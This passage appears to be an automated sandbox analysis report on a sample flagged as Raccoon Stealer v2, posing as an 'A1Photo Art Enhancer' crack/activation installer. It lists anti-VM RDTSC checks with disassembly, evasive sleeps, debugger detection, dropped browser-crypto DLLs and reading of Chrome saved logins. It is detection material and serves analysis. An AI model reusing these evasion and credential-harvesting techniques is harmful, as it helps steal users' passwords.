Source: C:\Users\user\AppData\Local\Temp\is-K5196.tmp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmp Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-K5196.tmp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmp Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-K5196.tmp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmp Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion
barindex
Query firmware table information (likely to detect VMs)
Source: C:\Users\user\AppData\Local\Temp\2.0.0-beta2.cps.exe System information queried: FirmwareTableInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2.0.0-beta2.cps.exe System information queried: FirmwareTableInformation Jump to behavior
Tries to evade analysis by execution special instruction (VM detection)
Source: C:\Users\user\AppData\Local\Temp\2.0.0-beta2.cps.exe Special instruction interceptor: First address: 0000000000F3F96C instructions rdtsc caused by: RDTSC with Trap Flag (TF)
Source: C:\Users\user\AppData\Local\Temp\2.0.0-beta2.cps.exe Special instruction interceptor: First address: 0000000000E151C1 instructions rdtsc caused by: RDTSC with Trap Flag (TF)
Tries to detect virtualization through RDTSC time measurements
Source: C:\Users\user\AppData\Local\Temp\2.0.0-beta2.cps.exe RDTSC instruction interceptor: First address: 0000000000F057DF second address: 0000000000F057EA instructions: 0x00000000 rdtsc 0x00000002 mov ebp, 6C567DA2h 0x00000007 pop ebp 0x00000008 bswap esi 0x0000000a pop edi 0x0000000b rdtsc
Source: C:\Users\user\AppData\Local\Temp\2.0.0-beta2.cps.exe RDTSC instruction interceptor: First address: 0000000000F0772D second address: 0000000000E842F2 instructions: 0x00000000 rdtsc 0x00000002 test sp, 69E2h 0x00000007 cmp ebp, 35ED30BCh 0x0000000d cmc 0x0000000e sub esi, 00000008h 0x00000014 test si, bp 0x00000017 cmc 0x00000018 mov dword ptr [esi], edx 0x0000001a cmp edx, eax 0x0000001c mov dword ptr [esi+04h], eax 0x0000001f xor al, 65h 0x00000021 ror al, 00000008h 0x00000024 lea edi, dword ptr [edi-00000004h] 0x0000002a add ah, FFFFFFEFh 0x0000002d shld ax, dx, 000000ADh 0x00000032 movsx eax, sp 0x00000035 mov eax, dword ptr [edi] 0x00000037 cmc 0x00000038 test dx, si 0x0000003b xor eax, ebx 0x0000003d jmp 00007F3880CC7661h 0x00000042 not eax 0x00000044 jmp 00007F3880A70423h 0x00000049 inc eax 0x0000004a jmp 00007F3880BC463Ch 0x0000004f bswap eax 0x00000051 inc eax 0x00000052 stc 0x00000053 jmp 00007F3880E3AE9Bh 0x00000058 xor ebx, eax 0x0000005a cmc 0x0000005b add ebp, eax 0x0000005d jmp 00007F3880B9D1CAh 0x00000062 jmp 00007F3880C31C8Eh 0x00000067 lea ecx, dword ptr [esp+60h] 0x0000006b cmp esi, ecx 0x0000006d jmp 00007F3880B95358h 0x00000072 ja 00007F3880C6EB57h 0x00000078 jmp ebp 0x0000007a mov ecx, dword ptr [esi] 0x0000007c cmovnb edx, ebx 0x0000007f mov dh, 00000054h 0x00000082 rdtsc
Source: C:\Users\user\AppData\Local\Temp\2.0.0-beta2.cps.exe RDTSC instruction interceptor: First address: 0000000000E13F38 second address: 0000000000E13F4C instructions: 0x00000000 rdtsc 0x00000002 mov edi, esp 0x00000004 rcr bp, 0056h 0x00000008 sar eax, cl 0x0000000a sub esp, 000000C0h 0x00000010 mov ebx, esi 0x00000012 ror al, cl 0x00000014 rdtsc
Source: C:\Users\user\AppData\Local\Temp\2.0.0-beta2.cps.exe RDTSC instruction interceptor: First address: 0000000000E5AB1B second address: 0000000000E5AB29 instructions: 0x00000000 rdtsc 0x00000002 pop ebp 0x00000003 cmp sp, sp 0x00000006 mov ebx, ebx 0x00000008 adc dx, 4935h 0x0000000d popfd 0x0000000e rdtsc
Source: C:\Users\user\AppData\Local\Temp\2.0.0-beta2.cps.exe RDTSC instruction interceptor: First address: 0000000000E096EF second address: 0000000000E842F2 instructions: 0x00000000 rdtsc 0x00000002 cmc 0x00000003 sub esi, 00000008h 0x00000009 test dh, FFFFFFAFh 0x0000000c clc 0x0000000d mov dword ptr [esi], edx 0x0000000f mov dword ptr [esi+04h], eax 0x00000012 sub edi, 00000004h 0x00000018 btr ax, 004Ch 0x0000001d xor al, 6Eh 0x0000001f mov eax, dword ptr [edi] 0x00000021 test si, 0EC0h 0x00000026 cmc 0x00000027 xor eax, ebx 0x00000029 jmp 00007F3880C2CC7Ah 0x0000002e not eax 0x00000030 inc eax 0x00000031 jmp 00007F3880E883C8h 0x00000036 bswap eax 0x00000038 jmp 00007F3880A38857h 0x0000003d inc eax 0x0000003e cmp si, dx 0x00000041 jmp 00007F3880C1770Ch 0x00000046 xor ebx, eax 0x00000048 cmp edi, 54DC680Dh 0x0000004e jmp 00007F3880C7E24Eh 0x00000053 add ebp, eax 0x00000055 jmp 00007F3880B46358h 0x0000005a jmp 00007F3880D471C3h 0x0000005f lea ecx, dword ptr [esp+60h] 0x00000063 cmp esi, ecx 0x00000065 jmp 00007F3880B951F8h 0x0000006a ja 00007F3880C6E9F7h 0x00000070 jmp ebp 0x00000072 mov ecx, dword ptr [esi] 0x00000074 cmovnb edx, ebx 0x00000077 mov dh, 00000054h 0x0000007a rdtsc
Source: C:\Users\user\AppData\Local\Temp\2.0.0-beta2.cps.exe RDTSC instruction interceptor: First address: 0000000000A9EC46 second address: 0000000000A9EC5A instructions: 0x00000000 rdtsc 0x00000002 mov edi, esp 0x00000004 rcr bp, 0056h 0x00000008 sar eax, cl 0x0000000a sub esp, 000000C0h 0x00000010 mov ebx, esi 0x00000012 ror al, cl 0x00000014 rdtsc
Source: C:\Users\user\AppData\Local\Temp\2.0.0-beta2.cps.exe RDTSC instruction interceptor: First address: 0000000000B4EE51 second address: 0000000000B4EE5F instructions: 0x00000000 rdtsc 0x00000002 pop ebp 0x00000003 cmp sp, sp 0x00000006 mov ebx, ebx 0x00000008 adc dx, 4935h 0x0000000d popfd 0x0000000e rdtsc
Source: C:\Users\user\AppData\Local\Temp\2.0.0-beta2.cps.exe RDTSC instruction interceptor: First address: 0000000000BA7F6C second address: 0000000000BFEDE4 instructions: 0x00000000 rdtsc 0x00000002 cmc 0x00000003 sub esi, 00000008h 0x00000009 test dh, FFFFFFAFh 0x0000000c clc 0x0000000d mov dword ptr [esi], edx 0x0000000f mov dword ptr [esi+04h], eax 0x00000012 sub edi, 00000004h 0x00000018 btr ax, 004Ch 0x0000001d xor al, 6Eh 0x0000001f mov eax, dword ptr [edi] 0x00000021 test si, 0EC0h 0x00000026 cmc 0x00000027 xor eax, ebx 0x00000029 jmp 00007F3880C65F7Bh 0x0000002e not eax 0x00000030 inc eax 0x00000031 jmp 00007F3880A032B5h 0x00000036 bswap eax 0x00000038 jmp 00007F3880C9CF65h 0x0000003d inc eax 0x0000003e cmp si, dx 0x00000041 jmp 00007F3880C8C1F9h 0x00000046 xor ebx, eax 0x00000048 cmp edi, 54DC680Dh 0x0000004e jmp 00007F3880C32E1Ah 0x00000053 add ebp, eax 0x00000055 jmp 00007F3880E20AC4h 0x0000005a jmp 00007F3880A1952Eh 0x0000005f lea ecx, dword ptr [esp+60h] 0x00000063 cmp esi, ecx 0x00000065 jmp 00007F3880CA8223h 0x0000006a ja 00007F3880D08B20h 0x00000070 jmp ebp 0x00000072 mov ecx, dword ptr [esi] 0x00000074 cmovnb edx, ebx 0x00000077 mov dh, 00000054h 0x0000007a rdtsc
Source: C:\Users\user\AppData\Local\Temp\2.0.0-beta2.cps.exe RDTSC instruction interceptor: First address: 0000000000BEF6D9 second address: 0000000000BFEDE4 instructions: 0x00000000 rdtsc 0x00000002 test esp, edi 0x00000004 cmp ecx, 48F76367h 0x0000000a sub esi, 00000008h 0x00000010 mov dword ptr [esi], edx 0x00000012 cmc 0x00000013 test esp, 07E44ACCh 0x00000019 mov dword ptr [esi+04h], eax 0x0000001c bt ax, 004Bh 0x00000021 rcl al, cl 0x00000023 xchg ah, al 0x00000025 lea edi, dword ptr [edi-00000004h] 0x0000002b lahf 0x0000002c mov ax, 74F3h 0x00000030 mov eax, dword ptr [edi] 0x00000032 clc 0x00000033 xor eax, ebx 0x00000035 jmp 00007F3880AC1624h 0x0000003a not eax 0x0000003c jmp 00007F3880B1F93Ah 0x00000041 inc eax 0x00000042 bswap eax 0x00000044 jmp 00007F3880DE2414h 0x00000049 inc eax 0x0000004a cmc 0x0000004b test eax, edi 0x0000004d xor ebx, eax 0x0000004f cmc 0x00000050 cmp sp, 1B06h 0x00000055 add ebp, eax 0x00000057 jmp 00007F3880A32C34h 0x0000005c jmp 00007F3880DA6E3Bh 0x00000061 lea ecx, dword ptr [esp+60h] 0x00000065 cmp esi, ecx 0x00000067 jmp 00007F3880CA80C3h 0x0000006c ja 00007F3880D089C0h 0x00000072 jmp ebp 0x00000074 mov ecx, dword ptr [esi] 0x00000076 cmovnb edx, ebx 0x00000079 mov dh, 00000054h 0x0000007c rdtsc
Source: C:\Users\user\AppData\Local\Temp\2.0.0-beta2.cps.exe RDTSC instruction interceptor: First address: 0000000000B67EE1 second address: 0000000000B67EEC instructions: 0x00000000 rdtsc 0x00000002 mov ebp, 6C567DA2h 0x00000007 pop ebp 0x00000008 bswap esi 0x0000000a pop edi 0x0000000b rdtsc
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Users\user\Desktop\KbqArOlW06.exe TID: 2236 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Found evasive API chain (date check)
Source: C:\Users\user\AppData\Local\Temp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.exe Evasive API call chain: GetSystemTime,DecisionNodes
Contains long sleeps (>= 3 min)
Source: C:\Users\user\Desktop\KbqArOlW06.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Found dropped PE file which has not been started or loaded
Source: C:\Users\user\AppData\Local\Temp\2.0.0-beta2.cps.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\msvcp140.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\2.0.0-beta2.cps.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\softokn3.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\2.0.0-beta2.cps.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\mozglue.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\2.0.0-beta2.cps.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\nss3.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\2.0.0-beta2.cps.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\vcruntime140.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\2.0.0-beta2.cps.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\freebl3.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-K5196.tmp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmp Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-Q7MJ8.tmp\_isetup\_setup64.tmp Jump to dropped file
Is looking for software installed on the system
Source: C:\Users\user\AppData\Local\Temp\2.0.0-beta2.cps.exe Registry key enumerated: More than 174 enums for key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
Source: C:\Users\user\Desktop\KbqArOlW06.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.exe API call chain: ExitProcess graph end node
Source: 2.0.0-beta2.cps.exe, 00000010.00000002.507528842.00000000012B6000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}!
Source: 2.0.0-beta2.cps.exe, 00000010.00000002.507528842.00000000012B6000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: MWar&Prod_VMware_SATA_CD00#5&280b647)
Source: C:\Users\user\AppData\Local\Temp\2.0.0-beta2.cps.exe Process information queried: ProcessInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.exe Code function: 21_2_0040A050 GetSystemInfo,VirtualQuery,VirtualProtect,VirtualProtect,VirtualQuery, 21_2_0040A050
Source: C:\Users\user\AppData\Local\Temp\is-K5196.tmp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmp Code function: 22_2_00476F44 FindFirstFileA,FindNextFileA,FindClose, 22_2_00476F44
Source: C:\Users\user\AppData\Local\Temp\is-K5196.tmp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmp Code function: 22_2_0049AF28 FindFirstFileA,SetFileAttributesA,FindNextFileA,FindClose, 22_2_0049AF28
Source: C:\Users\user\AppData\Local\Temp\is-K5196.tmp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmp Code function: 22_2_004650D0 SetErrorMode,FindFirstFileA,FindNextFileA,FindClose,SetErrorMode, 22_2_004650D0
Source: C:\Users\user\AppData\Local\Temp\is-K5196.tmp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmp Code function: 22_2_00453238 FindFirstFileA,GetLastError, 22_2_00453238
Source: C:\Users\user\AppData\Local\Temp\is-K5196.tmp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmp Code function: 22_2_0046554C SetErrorMode,FindFirstFileA,FindNextFileA,FindClose,SetErrorMode, 22_2_0046554C
Source: C:\Users\user\AppData\Local\Temp\is-K5196.tmp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmp Code function: 22_2_00463B44 FindFirstFileA,FindNextFileA,FindClose, 22_2_00463B44
Source: C:\Users\user\AppData\Local\Temp\2.0.0-beta2.cps.exe System information queried: ModuleInformation Jump to behavior

Anti Debugging
barindex
Hides threads from debuggers
Source: C:\Users\user\AppData\Local\Temp\2.0.0-beta2.cps.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2.0.0-beta2.cps.exe Thread information set: HideFromDebugger Jump to behavior
Contains functionality to dynamically determine API calls
Source: C:\Users\user\AppData\Local\Temp\is-K5196.tmp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmp Code function: 22_2_00450A28 GetVersion,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 22_2_00450A28
Checks if the current process is being debugged
Source: C:\Users\user\AppData\Local\Temp\2.0.0-beta2.cps.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2.0.0-beta2.cps.exe Process queried: DebugObjectHandle Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2.0.0-beta2.cps.exe Process queried: DebugObjectHandle Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2.0.0-beta2.cps.exe Process queried: DebugPort Jump to behavior
Checks for kernel debuggers (NtQuerySystemInformation(SystemKernelDebuggerInformation))
Source: C:\Users\user\AppData\Local\Temp\2.0.0-beta2.cps.exe System information queried: KernelDebuggerInformation Jump to behavior
Source: C:\Users\user\Desktop\KbqArOlW06.exe Memory allocated: page read and write | page guard Jump to behavior
Creates a process in suspended mode (likely to inject code)
Source: C:\Users\user\Desktop\KbqArOlW06.exe Process created: C:\Users\user\AppData\Local\Temp\2.0.0-beta2.cps.exe "C:\Users\user\AppData\Local\Temp\2.0.0-beta2.cps.exe" Jump to behavior
Source: C:\Users\user\Desktop\KbqArOlW06.exe Process created: C:\Users\user\AppData\Local\Temp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.exe "C:\Users\user\AppData\Local\Temp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.exe" Jump to behavior
Contains functionality to launch a program with higher privileges
Source: C:\Users\user\AppData\Local\Temp\is-K5196.tmp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmp Code function: 22_2_0047A678 ShellExecuteEx,GetLastError,MsgWaitForMultipleObjects,GetExitCodeProcess,CloseHandle, 22_2_0047A678
Source: C:\Users\user\AppData\Local\Temp\is-K5196.tmp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmp Code function: 22_2_0042E52C AllocateAndInitializeSid,GetVersion,GetModuleHandleA,GetProcAddress,CheckTokenMembership,GetCurrentThread,OpenThreadToken,GetLastError,GetCurrentProcess,OpenProcessToken,GetTokenInformation,GetLastError,GetTokenInformation,EqualSid,CloseHandle,FreeSid, 22_2_0042E52C
Source: C:\Users\user\AppData\Local\Temp\is-K5196.tmp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmp Code function: 22_2_0042F294 InitializeSecurityDescriptor,SetSecurityDescriptorDacl,CreateMutexA, 22_2_0042F294
Contains functionality to query locales information (e.g. system language)
Source: C:\Users\user\AppData\Local\Temp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.exe Code function: GetLocaleInfoA, 21_2_00405694
Source: C:\Users\user\AppData\Local\Temp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.exe Code function: GetLocaleInfoA, 21_2_004056E0
Source: C:\Users\user\AppData\Local\Temp\is-K5196.tmp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmp Code function: GetLocaleInfoA, 22_2_004089F8
Source: C:\Users\user\AppData\Local\Temp\is-K5196.tmp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmp Code function: GetLocaleInfoA, 22_2_00408A44
Queries the volume information (name, serial number etc) of a device
Source: C:\Users\user\Desktop\KbqArOlW06.exe Queries volume information: C:\Users\user\Desktop\KbqArOlW06.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2.0.0-beta2.cps.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.exe Code function: 21_2_004026C4 GetSystemTime, 21_2_004026C4
Source: C:\Users\user\AppData\Local\Temp\is-K5196.tmp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmp Code function: 22_2_00455DCC GetUserNameA, 22_2_00455DCC
Source: C:\Users\user\AppData\Local\Temp\is-K5196.tmp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmp Code function: 22_2_00458E58 GetTickCount,QueryPerformanceCounter,GetSystemTimeAsFileTime,GetCurrentProcessId,CreateNamedPipeA,GetLastError,CreateFileA,SetNamedPipeHandleState,CreateProcessA,CloseHandle,CloseHandle, 22_2_00458E58
Source: C:\Users\user\AppData\Local\Temp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.exe Code function: 21_2_00404654 GetModuleHandleA,GetVersion,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,SetProcessDEPPolicy, 21_2_00404654

Stealing of Sensitive Information
barindex
Yara detected Raccoon Stealer v2
Source: Yara match File source: 0.3.KbqArOlW06.exe.16636690.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.3.KbqArOlW06.exe.16726700.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.3.KbqArOlW06.exe.18de6818.7.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.3.KbqArOlW06.exe.179e67e0.6.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.3.KbqArOlW06.exe.166866c8.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.3.KbqArOlW06.exe.16866738.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.3.KbqArOlW06.exe.16ae6770.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.3.KbqArOlW06.exe.16fe67a8.5.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.2.2.0.0-beta2.cps.exe.9a0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.3.KbqArOlW06.exe.18de6818.7.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.0.2.0.0-beta2.cps.exe.9a0000.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.0.2.0.0-beta2.cps.exe.9a0000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.0.2.0.0-beta2.cps.exe.9a0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.3.KbqArOlW06.exe.16636690.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.3.KbqArOlW06.exe.16726700.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.3.KbqArOlW06.exe.16866738.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.3.KbqArOlW06.exe.16ae6770.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.3.KbqArOlW06.exe.179e67e0.6.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.3.KbqArOlW06.exe.166866c8.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.0.2.0.0-beta2.cps.exe.9a0000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.3.KbqArOlW06.exe.16fe67a8.5.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000000.00000003.264598811.000000001DAA2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.249916384.0000000018DE6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000003.491962653.0000000001250000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.271980164.0000000026172000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000003.491186607.000000000124A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000003.474319850.0000000001251000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.275645439.0000000036F02000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.235992777.00000000166BD000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000002.507099567.000000000122A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000003.469967022.0000000001253000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.236293949.000000001675D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.235782523.000000001666D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000003.492733952.000000000124A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000003.477408811.0000000001251000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.244960789.00000000179E6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000003.465053520.0000000001259000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.236963971.000000001689D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.285645229.000000004EF02000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.235724819.000000001662F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.237949559.0000000016B1D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Tries to harvest and steal browser information (history, passwords, etc)
Source: C:\Users\user\AppData\Local\Temp\2.0.0-beta2.cps.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data Jump to behavior
Yara detected Credential Stealer
Source: Yara match File source: Process Memory Space: 2.0.0-beta2.cps.exe PID: 2332, type: MEMORYSTR

Remote Access Functionality
barindex
Yara detected Raccoon Stealer v2
Source: Yara match File source: 0.3.KbqArOlW06.exe.16636690.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.3.KbqArOlW06.exe.16726700.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.3.KbqArOlW06.exe.18de6818.7.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.3.KbqArOlW06.exe.179e67e0.6.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.3.KbqArOlW06.exe.166866c8.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.3.KbqArOlW06.exe.16866738.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.3.KbqArOlW06.exe.16ae6770.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.3.KbqArOlW06.exe.16fe67a8.5.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.2.2.0.0-beta2.cps.exe.9a0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.3.KbqArOlW06.exe.18de6818.7.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.0.2.0.0-beta2.cps.exe.9a0000.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.0.2.0.0-beta2.cps.exe.9a0000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.0.2.0.0-beta2.cps.exe.9a0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.3.KbqArOlW06.exe.16636690.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.3.KbqArOlW06.exe.16726700.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.3.KbqArOlW06.exe.16866738.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.3.KbqArOlW06.exe.16ae6770.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.3.KbqArOlW06.exe.179e67e0.6.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.3.KbqArOlW06.exe.166866c8.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.0.2.0.0-beta2.cps.exe.9a0000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.3.KbqArOlW06.exe.16fe67a8.5.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000000.00000003.264598811.000000001DAA2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.249916384.0000000018DE6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000003.491962653.0000000001250000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.271980164.0000000026172000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000003.491186607.000000000124A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000003.474319850.0000000001251000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.275645439.0000000036F02000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.235992777.00000000166BD000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000002.507099567.000000000122A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000003.469967022.0000000001253000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.236293949.000000001675D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.235782523.000000001666D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000003.492733952.000000000124A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000003.477408811.0000000001251000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.244960789.00000000179E6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000003.465053520.0000000001259000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.236963971.000000001689D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.285645229.000000004EF02000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.235724819.000000001662F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.237949559.0000000016B1D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
